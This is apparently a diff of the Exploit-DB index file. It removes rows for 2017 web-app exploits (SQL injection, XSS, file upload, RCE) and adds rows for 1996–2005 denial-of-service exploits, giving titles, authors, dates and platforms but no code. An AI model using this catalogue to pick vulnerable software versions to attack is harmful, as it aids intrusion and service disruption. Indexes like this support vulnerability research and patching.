Injection",2017-10-24,8bitsec,php,webapps, -43047,exploits/php/webapps/43047.txt,"FS Thumbtack Clone - 'ser' SQL Injection",2017-10-24,8bitsec,php,webapps, -43048,exploits/php/webapps/43048.txt,"FS Trademe Clone - 'id' SQL Injection",2017-10-24,8bitsec,php,webapps, -43049,exploits/php/webapps/43049.txt,"FS Monster Clone - 'id' SQL Injection",2017-10-24,8bitsec,php,webapps, -43050,exploits/php/webapps/43050.txt,"FS Care Clone - 'sitterService' SQL Injection",2017-10-24,8bitsec,php,webapps, -43051,exploits/php/webapps/43051.txt,"FS Crowdfunding Script - 'id' SQL Injection",2017-10-24,8bitsec,php,webapps, -43052,exploits/php/webapps/43052.txt,"FS Realtor Clone - 'id' SQL Injection",2017-10-24,8bitsec,php,webapps, -43053,exploits/nodejs/webapps/43053.txt,"KeystoneJS 4.0.0-beta.5 - CSV Excel Macro Injection",2017-10-25,"Ishaq Mohammed",nodejs,webapps, -43054,exploits/nodejs/webapps/43054.txt,"KeystoneJS 4.0.0-beta.5 - Cross-Site Scripting",2017-10-25,"Ishaq Mohammed",nodejs,webapps, -43062,exploits/php/webapps/43062.txt,"PHP Melody 2.6.1 - SQL Injection",2017-10-28,"Venkat Rajgor",php,webapps, -43063,exploits/php/webapps/43063.txt,"PHPMyFAQ 2.9.8 - Cross-Site Scripting (3)",2017-10-28,"Nikhil Mittal",php,webapps, -43064,exploits/php/webapps/43064.txt,"phpMyFAQ 2.9.8 - Cross-Site Request Forgery",2017-10-27,"Nikhil Mittal",php,webapps, -43065,exploits/php/webapps/43065.py,"WordPress Plugin Ultimate Product Catalog 4.2.24 - PHP Object Injection",2017-10-30,tomplixsee,php,webapps, -43066,exploits/php/webapps/43066.txt,"Zomato Clone Script - 'resid' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps, -43067,exploits/php/webapps/43067.txt,"Website Broker Script - 'status_id' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps, -43068,exploits/php/webapps/43068.txt,"Vastal I-Tech Agent Zone - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps, -43069,exploits/php/webapps/43069.txt,"Php Inventory - Arbitrary File Upload",2017-10-30,"Ihsan Sencan",php,webapps, -43070,exploits/php/webapps/43070.txt,"Online Exam Test Application - 'sort' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps, -43071,exploits/php/webapps/43071.txt,"Nice PHP FAQ Script - 'nice_theme' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps, -43072,exploits/php/webapps/43072.txt,"Fake Magazine Cover Script - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps, -43073,exploits/php/webapps/43073.txt,"CPA Lead Reward Script - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps, -43074,exploits/php/webapps/43074.txt,"Basic B2B Script - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps, -43075,exploits/php/webapps/43075.txt,"CmsLite 1.4 - 'S' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps, -43076,exploits/php/webapps/43076.txt,"MyMagazine 1.0 - 'id' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps, -43077,exploits/php/webapps/43077.txt,"News 1.0 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps, -43078,exploits/php/webapps/43078.txt,"Newspaper 1.0 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps, -43079,exploits/php/webapps/43079.txt,"US Zip Codes Database - 'state' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps, -43080,exploits/php/webapps/43080.txt,"Shareet - 'photo' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps, -43081,exploits/php/webapps/43081.txt,"AROX School ERP PHP Script - 'id' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps, -43082,exploits/php/webapps/43082.txt,"Protected Links - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps, -43083,exploits/php/webapps/43083.txt,"ZeeBuddy 2x - 'groupid' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps, -43084,exploits/php/webapps/43084.txt,"Vastal I-Tech Dating Zone 0.9.9 - 'product_id' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps, -43085,exploits/php/webapps/43085.txt,"tPanel 2009 - Authentication Bypass",2017-10-30,"Ihsan Sencan",php,webapps, -43086,exploits/php/webapps/43086.txt,"Sokial Social Network Script 1.0 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps, -43087,exploits/php/webapps/43087.txt,"SoftDatepro Dating Social Network 1.3 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps, -43088,exploits/php/webapps/43088.txt,"Same Sex Dating Software Pro 1.0 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps, -43089,exploits/php/webapps/43089.txt,"PHP CityPortal 2.0 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps, -43090,exploits/php/webapps/43090.txt,"PG All Share Video 1.0 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps, -43091,exploits/php/webapps/43091.txt,"MyBuilder Clone 1.0 - 'subcategory' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps, -43092,exploits/php/webapps/43092.txt,"Mailing List Manager Pro 3.0 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps, -43093,exploits/php/webapps/43093.txt,"Joomla! Component Zh YandexMap 6.1.1.0 - 'placemarklistid' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps, -43094,exploits/php/webapps/43094.txt,"Joomla! Component NS Download Shop 2.2.6 - 'id' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps, -43095,exploits/php/webapps/43095.txt,"Job Board Script - 'nice_theme' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps, -43096,exploits/php/webapps/43096.txt,"iTech Gigs Script 1.21 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps, -43097,exploits/php/webapps/43097.txt,"iStock Management System 1.0 - Arbitrary File Upload",2017-10-30,"Ihsan Sencan",php,webapps, -43098,exploits/php/webapps/43098.txt,"iProject Management System 1.0 - 'ID' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps, -43099,exploits/php/webapps/43099.txt,"Article Directory Script 3.0 - 'id' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps, -43100,exploits/php/webapps/43100.txt,"Adult Script Pro 2.2.4 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps, -43101,exploits/php/webapps/43101.txt,"D-Park Pro 1.0 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps, -43102,exploits/php/webapps/43102.txt,"Ingenious 2.3.0 - Arbitrary File Upload",2017-10-30,"Ihsan Sencan",php,webapps, -43103,exploits/xml/webapps/43103.py,"Oracle Java SE - Web Start jnlp XML External Entity Processing Information Disclosure",2017-10-30,mr_me,xml,webapps, -43106,exploits/php/webapps/43106.txt,"OctoberCMS 1.0.426 (Build 426) - Cross-Site Request Forgery",2017-11-01,"Zain Sabahat",php,webapps, -43108,exploits/php/webapps/43108.txt,"Ingenious School Management System 2.3.0 - 'friend_index' SQL injection",2017-11-01,"Giulio Comi",php,webapps, -43110,exploits/php/webapps/43110.txt,"WordPress Plugin JTRT Responsive Tables 4.1 - SQL Injection",2017-11-03,"Lenon Leite",php,webapps, -43113,exploits/xml/webapps/43113.txt,"Ladon Framework for Python 0.9.40 - XML External Entity Expansion",2017-11-03,"RedTeam Pentesting",xml,webapps, -43114,exploits/java/webapps/43114.py,"Oracle PeopleSoft Enterprise PeopleTools < 8.55 - Remote Code Execution Via Blind XML External Entity",2017-05-17,"Charles Fol",java,webapps, -43117,exploits/php/webapps/43117.txt,"WordPress Plugin Userpro < 4.9.17.1 - Authentication Bypass",2017-11-04,"Colette Chamberland",php,webapps, -43122,exploits/multiple/webapps/43122.txt,"Logitech Media Server 7.9.0 - 'favorites' Cross-Site Scripting",2017-11-03,"Dewank Pant",multiple,webapps, -43123,exploits/multiple/webapps/43123.txt,"Logitech Media Server 7.9.0 - 'Radio URL' Cross-Site Scripting",2017-11-03,"Dewank Pant",multiple,webapps, -43128,exploits/php/webapps/43128.txt,"pfSense 2.3.1_1 - Command Execution",2017-11-07,s4squatch,php,webapps, -43129,exploits/windows/webapps/43129.txt,"ManageEngine Applications Manager 13 - SQL Injection",2017-11-07,"Cody Sixteen",windows,webapps,9090 -43136,exploits/php/webapps/43136.txt,"MyBB 1.8.13 - Remote Code Execution",2017-11-11,Pabstersac,php,webapps, -43137,exploits/php/webapps/43137.txt,"MyBB 1.8.13 - Cross-Site Scripting",2017-11-11,Pabstersac,php,webapps, -43138,exploits/php/webapps/43138.rb,"Web Viewer 1.0.0.193 (Samsung SRN-1670D) - Unrestricted File Upload",2017-11-13,0xFFFFFF,php,webapps, -43140,exploits/php/webapps/43140.txt,"Kirby CMS < 2.5.7 - Cross-Site Scripting",2017-11-13,"Ishaq Mohammed",php,webapps, -43155,exploits/php/webapps/43155.txt,"Zeta Components Mail 1.8.1 - Remote Code Execution",2017-11-16,MalwareBenchmark,php,webapps, -43158,exploits/hardware/webapps/43158.txt,"Icon Time Systems RTC-1000 Firmware 2.5.7458 - Cross-Site Scripting",2017-11-17,"Keith Thome",hardware,webapps, +id,file,description,date,author,type,platform,port +9,exploits/windows/dos/9.c,"Apache 2.x - Memory Leak",2003-04-09,"Matthew Murphy",dos,windows, +37060,exploits/windows/dos/37060.html,"Microsoft Internet Explorer 11 - Crash (PoC) (1)",2015-05-19,Garage4Hackers,dos,windows, +11,exploits/linux/dos/11.c,"Apache 2.0.44 (Linux) - Remote Denial of Service",2003-04-11,"Daniel Nystram",dos,linux, +13,exploits/windows/dos/13.c,"Chindi Server 1.0 - Denial of Service",2003-04-18,"Luca Ercoli",dos,windows, +17,exploits/windows/dos/17.pl,"Xeneo Web Server 2.2.9.0 - Denial of Service",2003-04-22,"Tom Ferris",dos,windows, +22,exploits/windows/dos/22.c,"Pi3Web 2.0.1 - Denial of Service (PoC)",2003-04-29,aT4r,dos,windows, +35,exploits/windows/dos/35.c,"Microsoft IIS 5.0 < 5.1 - Remote Denial of Service",2003-05-31,Shachank,dos,windows, +38,exploits/linux/dos/38.pl,"Apache 2.0.45 - 'APR' Crash",2003-06-08,"Matthew Murphy",dos,linux,80 +59,exploits/hardware/dos/59.c,"Cisco IOS - IPv4 Packets Denial of Service",2003-07-18,l0cK,dos,hardware, +60,exploits/hardware/dos/60.c,"Cisco IOS - 'cisco-bug-44020.c' IPv4 Packet Denial of Service",2003-07-21,"Martin Kluge",dos,hardware, +61,exploits/windows/dos/61.c,"Microsoft Windows Server 2000 - RPC DCOM Interface Denial of Service",2003-07-21,Flashsky,dos,windows, +62,exploits/hardware/dos/62.tcsh,"Cisco IOS - using hping Remote Denial of Service",2003-07-22,zerash,dos,hardware, +65,exploits/windows/dos/65.c,"Microsoft Windows SQL Server - Remote Denial of Service (MS03-031)",2003-07-25,refdom,dos,windows, +68,exploits/linux/dos/68.c,"Linux Kernel 2.4.20 - 'decode_fh' Denial of Service",2003-07-29,"Jared Stanbrough",dos,linux, +73,exploits/windows/dos/73.c,"Trillian 0.74 - Remote Denial of Service",2003-08-01,l0bstah,dos,windows, +82,exploits/windows/dos/82.c,"Piolet Client 1.05 - Remote Denial of Service",2003-08-20,"Luca Ercoli",dos,windows, +94,exploits/multiple/dos/94.c,"MyServer 0.4.3 - Denial of Service",2003-09-08,badpack3t,dos,multiple,80 +111,exploits/windows/dos/111.c,"Microsoft Windows Messenger Service - Denial of Service (MS03-043)",2003-10-18,LSD-PLaNET,dos,windows, +113,exploits/windows/dos/113.pl,"Microsoft Exchange Server 2000 - XEXCH50 Heap Overflow (PoC) (MS03-046)",2003-10-22,"H D Moore",dos,windows, +115,exploits/linux/dos/115.c,"WU-FTPD 2.6.2 - 'wuftpd-freezer.c' Remote Denial of Service",2003-10-31,"Angelo Rosiello",dos,linux, +146,exploits/multiple/dos/146.c,"OpenSSL ASN.1 < 0.9.6j/0.9.7b - Brute Forcer for Parsing Bugs",2003-10-09,"Bram Matthys",dos,multiple, +147,exploits/windows/dos/147.c,"Need for Speed 2 - Remote Client Buffer Overflow",2004-01-23,"Luigi Auriemma",dos,windows, +148,exploits/windows/dos/148.sh,"Microsoft Windows XP/2003 - Samba Share Resource Exhaustion (Denial of Service)",2004-01-25,"Steve Ladjabi",dos,windows, +153,exploits/windows/dos/153.c,"Microsoft Windows - ASN.1 'LSASS.exe' Remote Denial of Service (MS04-007)",2004-02-14,"Christophe Devine",dos,windows, +161,exploits/windows/dos/161.c,"Red Faction 1.20 - Server Reply Remote Buffer Overflow",2004-03-04,"Luigi Auriemma",dos,windows, +170,exploits/multiple/dos/170.c,"Ethereal - EIGRP Dissector TLV_IP_INT Long IP Remote Denial of Service",2004-03-26,"Rémi Denis-Courmont",dos,multiple, +176,exploits/windows/dos/176.c,"Microsoft IIS - SSL Remote Denial of Service (MS04-011)",2004-04-14,"David Barroso",dos,windows, +185,exploits/linux/dos/185.sh,"Slackware Linux - '/usr/bin/ppp-off' Insecure /tmp Call",2000-11-17,sinfony,dos,linux, +195,exploits/hp-ux/dos/195.sh,"HP-UX 11.00/10.20 crontab - Overwrite Files",2000-11-19,dubhe,dos,hp-ux, +212,exploits/hp-ux/dos/212.c,"HP-UX FTPD - Remote Buffer Overflow",2000-12-01,venglin,dos,hp-ux, +214,exploits/windows/dos/214.c,"Microsoft Windows - 'Jolt2.c' Denial of Service (MS00-029)",2000-12-02,phonix,dos,windows, +233,exploits/windows/dos/233.pl,"Solaris 2.7/2.8 Catman - Local Insecure tmp Symlink",2000-12-19,"Shane Hird",dos,windows, +235,exploits/solaris/dos/235.pl,"SunOS 5.7 Catman - Local Insecure tmp Symlink Clobber",2000-12-20,lwc,dos,solaris, +236,exploits/linux/dos/236.sh,"RedHat 6.1/6.2 - TTY Flood Users",2001-01-02,teleh0r,dos,linux, +238,exploits/linux/dos/238.c,"ml2 - Local users can Crash processes",2001-01-03,Stealth,dos,linux, +240,exploits/solaris/dos/240.sh,"Solaris 2.6 / 7 / 8 - Lock Users Out of mailx",2001-01-03,Optyx,dos,solaris, +241,exploits/linux/dos/241.c,"ProFTPd 1.2.0 rc2 - Memory Leakage",2001-01-03,"Piotr Zurawski",dos,linux,21 +244,exploits/linux/dos/244.java,"ProFTPd 1.2.0 pre10 - Remote Denial of Service",2001-01-12,JeT-Li,dos,linux,21 +251,exploits/linux/dos/251.c,"APC UPS 3.7.2 - 'apcupsd' Local Denial of Service",2001-01-15,"the itch",dos,linux, +262,exploits/hardware/dos/262.pl,"Cisco (Multiple Products) - Automated Tool",2001-01-27,hypoclear,dos,hardware, +264,exploits/novell/dos/264.c,"Novell BorderManager Enterprise Edition 3.5 - Denial of Service",2001-05-07,honoriak,dos,novell, +274,exploits/linux/dos/274.c,"Linux Kernel 2.6.3 - 'setsockopt' Local Denial of Service",2004-04-21,"Julien Tinnes",dos,linux, +276,exploits/windows/dos/276.delphi,"Microsoft Windows XP/2000 - TCP Connection Reset",2004-04-22,Aphex,dos,windows, +291,exploits/linux/dos/291.c,"TCP Connection Reset - Remote Denial of Service",2004-04-23,"Paul A. Watson",dos,linux, +298,exploits/windows/dos/298.pl,"Emule 0.42e - Remote Denial of Service",2004-05-16,"Rafel Ivgi",dos,windows,80 +299,exploits/windows/dos/299.c,"Symantec Multiple Firewall - DNS Response Denial of Service",2004-05-16,houseofdabus,dos,windows, +306,exploits/linux/dos/306.c,"Linux Kernel 2.4.x/2.6.x - Assembler Inline Function Local Denial of Service",2004-06-25,lorenzo,dos,linux, +312,exploits/windows/dos/312.txt,"Norton AntiVirus - Denial of Service",2004-07-12,"Bipin Gautam",dos,windows, +324,exploits/windows/dos/324.txt,"Ping of Death - Remote Denial of Service",1996-10-21,anonymous,dos,windows, +329,exploits/windows/dos/329.txt,"Microsoft Windows NT - Crash with an Extra Long 'Username' Denial of Service",1997-04-01,Fyodor,dos,windows, +343,exploits/bsd/dos/343.c,"TCP SYN - 'bang.c' Denial of Service",2002-09-17,Nebunu,dos,bsd, +345,exploits/windows/dos/345.c,"UDP Stress Tester - Denial of Service",2002-09-10,Cys,dos,windows, +354,exploits/windows/dos/354.html,"Microsoft Internet Explorer - Overly Trusted Location Cache",2004-07-18,anonymous,dos,windows, +356,exploits/windows/dos/356.c,"OverByte ICS FTP Server - Remote Denial of Service",2004-07-20,ATmaCA,dos,windows, +357,exploits/windows/dos/357.c,"Medal of Honor - Remote Buffer Overflow",2004-07-20,"Luigi Auriemma",dos,windows, +358,exploits/hardware/dos/358.txt,"Lexmark Multiple HTTP Servers - Denial of Service",2004-07-22,"Peter Kruse",dos,hardware, +360,exploits/multiple/dos/360.pl,"Apache - Arbitrary Long HTTP Headers Denial of Service (Perl)",2004-07-22,bkbll,dos,multiple,80 +362,exploits/windows/dos/362.sh,"Xitami Web Server - Denial of Service",2004-07-22,CoolICE,dos,windows, +363,exploits/hardware/dos/363.txt,"Conceptronic CADSLR1 Router - Denial of Service",2004-07-22,"Seth Alan Woolley",dos,hardware, +365,exploits/windows/dos/365.html,"Microsoft Internet Explorer - Denial of Service (11 bytes)",2004-07-23,Phuong,dos,windows, +366,exploits/windows/dos/366.pl,"Microsoft Windows SMS 2.0 - Denial of Service",2004-07-24,MacDefender,dos,windows, +370,exploits/linux/dos/370.c,"Citadel/UX - Remote Denial of Service (PoC)",2004-08-02,CoKi,dos,linux, +371,exploits/linux/dos/371.c,"Apache - Arbitrary Long HTTP Headers Denial of Service (C)",2004-08-02,anonymous,dos,linux, +376,exploits/windows/dos/376.html,"Microsoft Internet Explorer - 'mshtml.dll' Remote Null Pointer Crash",2004-08-04,anonymous,dos,windows, +383,exploits/multiple/dos/383.c,"psyBNC 2.3 - Denial of Service",2002-05-19,"Lunar Fault",dos,multiple,31337 +385,exploits/windows/dos/385.c,"Microsoft Messenger (Linux) - Denial of Service (MS03-043)",2004-08-08,VeNoMouS,dos,windows, +403,exploits/windows/dos/403.c,"IPD (Integrity Protection Driver) - Denial of Service",2004-08-18,anonymous,dos,windows, +419,exploits/windows/dos/419.pl,"BadBlue 2.52 Web Server - Multiple Connections Denial of Service Vulnerabilities",2004-08-26,"GulfTech Security",dos,windows, +420,exploits/win_x86/dos/420.java,"Bird Chat 1.61 - Denial of Service",2004-08-26,"Donato Ferrante",dos,win_x86, +422,exploits/windows/dos/422.c,"Painkiller 1.3.1 - Denial of Service",2004-08-27,"Luigi Auriemma",dos,windows, +423,exploits/windows/dos/423.pl,"Easy File Sharing Web Server 1.25 - Denial of Service",2004-08-27,"GulfTech Security",dos,windows, +427,exploits/windows/dos/427.c,"WFTPD Pro Server 3.21 - MLST Remote Denial of Service",2004-08-31,lion,dos,windows, +428,exploits/windows/dos/428.c,"CesarFTP Server - Long Command Denial of Service",2004-08-31,lion,dos,windows, +429,exploits/windows/dos/429.c,"Ground Control 1.0.0.7 - 'Server/Client' Denial of Service",2004-08-31,"Luigi Auriemma",dos,windows, +433,exploits/multiple/dos/433.c,"Call of Duty 1.4 - Denial of Service",2004-09-05,"Luigi Auriemma",dos,multiple, +463,exploits/windows/dos/463.c,"RhinoSoft Serv-U FTP Server < 5.2 - Remote Denial of Service",2004-09-13,str0ke,dos,windows, +468,exploits/windows/dos/468.c,"Pigeon Server 3.02.0143 - Denial of Service",2004-09-19,"Luigi Auriemma",dos,windows, +471,exploits/windows/dos/471.pl,"Emulive Server4 7560 - Remote Denial of Service",2004-09-21,"GulfTech Security",dos,windows,66 +474,exploits/windows/dos/474.sh,"Microsoft Windows - JPEG Processing Buffer Overrun (MS04-028)",2004-09-22,perplexy,dos,windows, +477,exploits/windows/dos/477.c,"PopMessenger 1.60 - Remote Denial of Service",2004-09-23,"Luigi Auriemma",dos,windows,8473 +551,exploits/linux/dos/551.c,"MyServer 0.7.1 - 'POST' Denial of Service",2004-09-27,"Tom Ferris",dos,linux, +562,exploits/windows/dos/562.c,"MSSQL 7.0 - Remote Denial of Service",2004-09-29,"securma massine",dos,windows, +571,exploits/windows/dos/571.c,"Monolith Games - Local Buffer Overflow",2004-10-10,"Luigi Auriemma",dos,windows, +578,exploits/windows/dos/578.pl,"Microsoft Windows NNTP Service (XPAT) - Denial of Service (MS04-036)",2004-10-16,"Lucas Lavarello",dos,windows, +585,exploits/windows/dos/585.pl,"Microsoft IIS - WebDAV XML Denial of Service (MS04-030)",2004-10-20,"Amit Klein",dos,windows, +593,exploits/windows/dos/593.pl,"Quick 'n EasY 2.4 FTP Server - Remote Denial of Service",2004-10-24,KaGra,dos,windows, +594,exploits/windows/dos/594.pl,"BaSoMail Server 1.24 - POP3/SMTP Remote Denial of Service",2004-10-24,KaGra,dos,windows, +599,exploits/windows/dos/599.py,"BaSoMail - Multiple Buffer Overflow Denial of Service Vulnerabilities",2004-10-26,muts,dos,windows, +603,exploits/windows/dos/603.c,"Master of Orion III 1.2.5 - Denial of Service",2004-10-27,"Luigi Auriemma",dos,windows, +604,exploits/windows/dos/604.c,"Age of Sail II 1.04.151 - Remote Buffer Overflow",2004-03-03,"Luigi Auriemma",dos,windows, +605,exploits/windows/dos/605.c,"Alpha Black Zero 1.04 - Remote Denial of Service",2004-03-03,"Luigi Auriemma",dos,windows, +606,exploits/windows/dos/606.c,"Chatman 1.5.1 RC1 - Broadcast Crash",2004-03-01,"Luigi Auriemma",dos,windows, +607,exploits/windows/dos/607.c,"Flash Messaging 5.2.0g - Remote Denial of Service",2004-03-02,"Luigi Auriemma",dos,windows, +611,exploits/windows/dos/611.c,"Chesapeake TFTP Server 1.0 - Directory Traversal / Denial of Service (PoC)",2004-11-01,"Luigi Auriemma",dos,windows, +625,exploits/windows/dos/625.pl,"WinFTP Server 1.6 - Denial of Service",2004-11-11,KaGra,dos,windows, +626,exploits/windows/dos/626.c,"Kerio Personal Firewall 4.1.1 - Multiple IP Options Denial of Service Vulnerabilities",2004-11-12,houseofdabus,dos,windows, +628,exploits/windows/dos/628.c,"NetNote Server 2.2 build 230 - Crafted String Denial of Service",2004-11-13,class101,dos,windows, +634,exploits/windows/dos/634.pl,"Secure Network Messenger 1.4.2 - Denial of Service",2004-11-15,ClearScreen,dos,windows, +649,exploits/windows/dos/649.c,"wodFtpDLX Client - ActiveX Control Buffer Overflow Crash",2004-11-22,Komrade,dos,windows, +651,exploits/windows/dos/651.c,"Halo 1.05 - Broadcast Client Crash",2004-11-22,"Luigi Auriemma",dos,windows, +653,exploits/windows/dos/653.c,"Soldier of Fortune II 1.3 Server/Client - Denial of Service",2004-11-23,"Luigi Auriemma",dos,windows, +655,exploits/windows/dos/655.c,"Star Wars Battlefront 1.1 - Fake Players Denial of Service",2004-11-24,"Luigi Auriemma",dos,windows, +662,exploits/windows/dos/662.pl,"3Dmax 6.x backburner Manager 2.2 - Denial of Service",2004-11-28,Xtiger,dos,windows, +664,exploits/windows/dos/664.c,"Ipswitch WS_FTP Server 5.03 - MKD Remote Buffer Overflow",2004-11-29,NoPh0BiA,dos,windows, +665,exploits/windows/dos/665.c,"Orbz Game 2.10 - Remote Buffer Overflow",2004-11-29,"Luigi Auriemma",dos,windows, +667,exploits/windows/dos/667.c,"Jana Server 2.4.4 - 'http/pna' Denial of Service",2004-11-30,"Luigi Auriemma",dos,windows, +671,exploits/windows/dos/671.c,"Neverwinter Nights special - Fake Players Denial of Service",2004-12-01,"Luigi Auriemma",dos,windows, +672,exploits/windows/dos/672.c,"Kreed 1.05 - Format String / Denial of Service",2004-12-02,"Luigi Auriemma",dos,windows, +677,exploits/windows/dos/677.txt,"GetRight 5.2a - '.grs' Skin File Buffer Overflow",2004-12-06,ATmaCA,dos,windows, +679,exploits/windows/dos/679.c,"Battlefield 1942 1.6.19 + Vietnam 1.2 - Broadcast Client Crash",2004-12-07,"Luigi Auriemma",dos,windows, +682,exploits/windows/dos/682.c,"Codename Eagle 1.42 - Socket Unreacheable Denial of Service",2004-12-13,"Luigi Auriemma",dos,windows, +683,exploits/windows/dos/683.c,"Lithtech Engine (new protocol) - Socket Unreacheable Denial of Service",2004-12-13,"Luigi Auriemma",dos,windows, +685,exploits/linux/dos/685.c,"Linux Kernel 2.4.28/2.6.9 - 'scm_send Local' Denial of Service",2004-12-14,"Paul Starzetz",dos,linux, +686,exploits/linux/dos/686.c,"Linux Kernel 2.4.22-28/2.6.9 - 'igmp.c' Local Denial of Service",2004-12-14,"Paul Starzetz",dos,linux, +687,exploits/windows/dos/687.c,"OpenText FirstClass 8.0 - HTTP Daemon /Search Remote Denial of Service",2004-12-15,dila,dos,windows, +688,exploits/hardware/dos/688.c,"Ricoh Aficio 450/455 PCL 5e Printer - ICMP Denial of Service",2004-12-15,x90c,dos,hardware, +690,exploits/linux/dos/690.c,"Linux Kernel 2.4.28/2.6.9 - vc_resize int Local Overflow",2004-12-16,"Georgi Guninski",dos,linux, +691,exploits/linux/dos/691.c,"Linux Kernel 2.4.28/2.6.9 - Memory Leak Local Denial of Service",2004-12-16,"Georgi Guninski",dos,linux, +692,exploits/linux/dos/692.c,"Linux Kernel 2.4.28/2.6.9 - 'ip_options_get' Local Overflow",2004-12-16,"Georgi Guninski",dos,linux, +700,exploits/windows/dos/700.html,"Microsoft Internet Explorer / MSN - Memory_Access_Violation Denial of Service",2004-12-21,"Emmanouel Kellinis",dos,windows, +721,exploits/windows/dos/721.html,"Microsoft Windows Kernel - '.ANI' File Parsing Crash",2004-12-25,Flashsky,dos,windows, +736,exploits/windows/dos/736.c,"SOLDNER Secret Wars 30830 - Denial of Service",2005-01-04,"Luigi Auriemma",dos,windows,20000 +738,exploits/php/dos/738.c,"iWebNegar 1.1 - Configuration Nullification Denial of Service",2005-01-04,c0d3r,dos,php, +742,exploits/windows/dos/742.c,"Gore 1.50 - Socket Unreacheable Denial of Service",2005-01-06,"Luigi Auriemma",dos,windows, +743,exploits/windows/dos/743.html,"Norton AntiVirus < 2005 - Remote Stack Overflow",2005-01-06,"Rafel Ivgi",dos,windows, +755,exploits/windows/dos/755.c,"Breed patch #1 - Zero-Length Remote Crash",2005-01-13,"Luigi Auriemma",dos,windows,7649 +762,exploits/osx/dos/762.c,"Apple Mac OSX 10.3.7 - Input Validation Flaw 'parse_machfile()' Denial of Service",2005-01-20,nemo,dos,osx, +770,exploits/windows/dos/770.txt,"Apple QuickTime 6.5.2.10 - '.qtif' Image Parsing",2005-01-24,ATmaCA,dos,windows, +780,exploits/windows/dos/780.c,"Xpand Rally 1.0.0.0 (Server/Clients) - Crash",2005-01-31,"Luigi Auriemma",dos,windows,28015 +782,exploits/windows/dos/782.pl,"TinyWeb 1.9 - Denial of Service",2005-02-01,karak0rsan,dos,windows,80 +783,exploits/windows/dos/783.c,"Painkiller 1.35 - in-game cd-key alpha-numeric Buffer Overflow",2005-02-02,"Luigi Auriemma",dos,windows, +789,exploits/linux/dos/789.c,"ngIRCd 0.8.1 - Remote Denial of Service (2)",2005-02-05,CorryL,dos,linux,6667 +797,exploits/windows/dos/797.py,"Foxmail 2.0 - 'MAIL FROM:' Denial of Service",2005-02-07,OYXin,dos,windows, +799,exploits/osx/dos/799.c,"Apple Mac OSX - AppleFileServer Remote Denial of Service",2005-02-08,nemo,dos,osx, +810,exploits/windows/dos/810.c,"Armagetron Advanced 0.2.7.0 - Server Crash",2005-02-10,"Luigi Auriemma",dos,windows, +813,exploits/windows/dos/813.c,"Quake 3 Engine - Infostring Crash and Shutdown",2005-02-12,"Luigi Auriemma",dos,windows, +815,exploits/linux/dos/815.c,"CA BrightStor ARCserve Backup - Remote Buffer Overflow (PoC)",2005-02-12,cybertronic,dos,linux, +817,exploits/cgi/dos/817.pl,"AWStats 6.4 - Denial of Service",2005-02-14,GHC,dos,cgi, +838,exploits/multiple/dos/838.pl,"webconnect 6.4.4 < 6.5 - Directory Traversal / Denial of Service",2005-02-24,karak0rsan,dos,multiple, +841,exploits/windows/dos/841.c,"Soldier of Fortune 2 1.03 - 'cl_guid' Server Crash",2005-02-24,"Luigi Auriemma",dos,windows, +842,exploits/linux/dos/842.c,"WU-FTPD 2.6.2 - File Globbing Denial of Service",2005-02-25,str0ke,dos,linux, +843,exploits/windows/dos/843.c,"KNet Web Server 1.04c - Buffer Overflow Denial of Service",2005-02-25,CorryL,dos,windows, +849,exploits/windows/dos/849.c,"Scrapland 1.0 - Server Termination Denial of Service",2005-02-28,"Luigi Auriemma",dos,windows, +852,exploits/windows/dos/852.py,"Trillian Basic 3.0 - '.png' Image Processing Buffer Overflow",2005-03-02,"Tal Zeltzer",dos,windows, +855,exploits/multiple/dos/855.pl,"Apache 2.0.52 - GET Denial of Service",2005-03-04,GreenwooD,dos,multiple, +856,exploits/hardware/dos/856.c,"Nokia Symbian 60 - 'BlueTooth Nickname' Remote Restart (2)",2005-09-23,Qnix,dos,hardware, +861,exploits/windows/dos/861.c,"Microsoft Windows XP/2003 - Remote Denial of Service",2005-03-07,RusH,dos,windows, +867,exploits/multiple/dos/867.c,"Ethereal 0.10.9 - Denial of Service",2005-03-08,"Leon Juranic",dos,multiple, +869,exploits/bsd/dos/869.c,"OpenBSD 2.0 < 3.6 - TCP Timestamp Remote Denial of Service",2005-03-09,RusH,dos,bsd, +874,exploits/windows/dos/874.cpp,"Ethereal 0.10.9 (Windows) - '3G-A11' Remote Buffer Overflow",2005-03-12,"Leon Juranic",dos,windows, +880,exploits/multiple/dos/880.pl,"Freeciv Server 2.0.0beta8 - Denial of Service",2005-03-14,"Nico Spicher",dos,multiple, +882,exploits/windows/dos/882.cpp,"GoodTech Telnet Server < 5.0.7 - Buffer Overflow Crash",2005-03-15,Komrade,dos,windows, +886,exploits/windows/dos/886.pl,"PlatinumFTP 1.0.18 - Multiple Remote Denial of Service Vulnerabilities",2005-03-17,ports,dos,windows, 